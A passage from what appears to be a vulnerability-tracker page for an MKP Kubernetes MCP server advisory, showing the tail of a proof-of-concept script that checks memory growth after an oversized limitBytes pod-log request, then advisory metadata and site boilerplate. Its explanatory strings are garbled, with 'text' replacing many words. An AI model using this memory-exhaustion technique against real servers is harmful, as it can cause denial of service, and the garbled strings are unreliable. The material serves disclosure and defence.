\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n    passed = delta_mb \u003e= 50.0\n\n    if passed:\n        verdict = \"PASS\"\n        init_mb = ev.get(\u0027initial_mb\u0027, 0)\n        peak_mb = ev.get(\u0027peak_mb\u0027, 0)\n        reason = (\n            f\"MKP server RSStext {init_mb:.1f} MB \u2192 {peak_mb:.1f} MBtext {delta_mb:.1f} MB increasedone. \"\n            f\"the attacker limitBytes=134217728 (128 MB)text tools/call requesttext containswhentextcharacters \"\n            f\"pkg/k8s/subresource.go:114-115text io.Copy(buf, podLogs)text limit text \"\n            f\"bytes.Buffertext 128 MB text streamtext beforetext text thattext dynamicas confirmed.\"\n        )\n    else:\n        verdict = \"INCOMPLETE\"\n        reason = (\n            f\"RSS text {delta_mb:.1f} MB \u2014 50 MB criteria text. \"\n            f\"possibletext cause: MCP session initialization failure, 30seconds texttext timeout text exit, \"\n            f\"or Mock API response textreached. container logs text 500characters: {run_output[-500:]}\"\n        )\n\n    result = {\n        \"passed\": passed,\n        \"verdict\": verdict,\n        \"reason\": reason,\n        \"build_command\": BUILD_CMD,\n        \"run_command\": RUN_CMD,\n        \"poc_command\": \"python3 vuln-001/poc.py\",\n        \"evidence\": extract_evidence_block(run_output),\n        \"artifacts\": [\"Dockerfile\", \"poc.py\"],\n    }\n    save_result(result)\n\n    print(f\"\\n[poc] {\u0027PASS\u0027 if passed else \u0027INCOMPLETE\u0027}: {reason}\")\n    return passed\n\n\nif __name__ == \u0027__main__\u0027:\n    ok = main()\n    sys.exit(0 if ok else 1)\n```",
  "id": "GHSA-qw5r-ppcg-f8rj",
  "modified": "2026-07-14T18:09:48Z",
  "published": "2026-07-14T18:09:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/StacklokLabs/mkp/security/advisories/GHSA-qw5r-ppcg-f8rj"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/StacklokLabs/mkp"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "MKP: Unbounded Pod Log Read via Attacker-Controlled `limitBytes`/`tailLines` Causes Memory Exhaustion"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…